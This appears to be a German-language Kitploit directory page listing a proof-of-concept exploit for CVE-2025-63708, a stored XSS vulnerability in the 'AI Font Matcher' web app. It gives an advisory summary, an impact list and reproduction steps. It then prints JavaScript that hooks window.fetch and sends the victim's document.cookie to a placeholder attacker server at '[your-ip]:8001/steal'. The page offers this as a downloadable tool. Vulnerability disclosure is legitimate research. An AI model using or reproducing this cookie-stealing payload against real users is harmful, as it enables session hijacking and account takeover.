Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-63708 — Proof-of-Concept-Exploit für CVE-2025-63708, eine gespeicherte XSS-Schwachstelle im AI Font Matcher. Demonstriert den Diebstahl von Sitzungscookies über nicht bereinigte Schriftartenfamiliennamen in Webfonts-Abrufantworten. | Kitploit
Tools/GitHubGitHub/dylandavis1/cve-2025-63708
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Proof-of-Concept-Exploit für CVE-2025-63708, eine gespeicherte XSS-Schwachstelle im AI Font Matcher. Demonstriert den Diebstahl von Sitzungscookies über nicht bereinigte Schriftartenfamiliennamen in Webfonts-Abrufantworten.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-63708

CVE-ID: CVE-2025-63708
Zugewiesen: 11-12-2025 Problemtyp: CWE-79 (Cross-Site Scripting)
Betroffenes Produkt: „AI Font Matcher“ (veröffentlicht am 2025-10-10, nid=18425)
Produktseite: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Entdeckungsdatum: 2025-10-11
Forscher: Dylan Davis

Zusammenfassung

Die Anwendung verarbeitet Daten aus einem webfonts-Abruf, ohne die Schriftfamiliennamen zu bereinigen. Ein Angreifer, der diese Antwort kontrolliert oder abfängt, kann JavaScript einschleusen, das im Seitenkontext ausgeführt wird, und so Session-Cookies stehlen sowie Konten übernehmen.

Auswirkungen

  • Beliebige JavaScript-Ausführung im Browser des Opfers
  • Ausleitung von Session-Cookies (während meiner Tests wurden nicht-HttpOnly-Cookies beobachtet)
  • Kontoübernahme und Aktionen, die im Namen des Benutzers ausgeführt werden

Betroffene Versionen / Umfang

  • Das Paket „AI Font Matcher“, wie es am 2025-10-10 auf SourceCodester verteilt wurde.

Reproduktion (PoC)

Dieser PoC demonstriert die Codeausführung, indem window.fetch abgefangen und eine kontrollierte Web-Fonts-Nutzlast zurückgegeben wird.

  1. Führen Sie die App lokal aus dem heruntergeladenen Quellcode aus.
  2. Öffnen Sie DevTools → Konsole und fügen Sie den folgenden PoC ein (oder laden Sie poc.js).
  3. Lösen Sie die UI aus, die webfonts abruft; beobachten Sie ein alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Tool herunterladen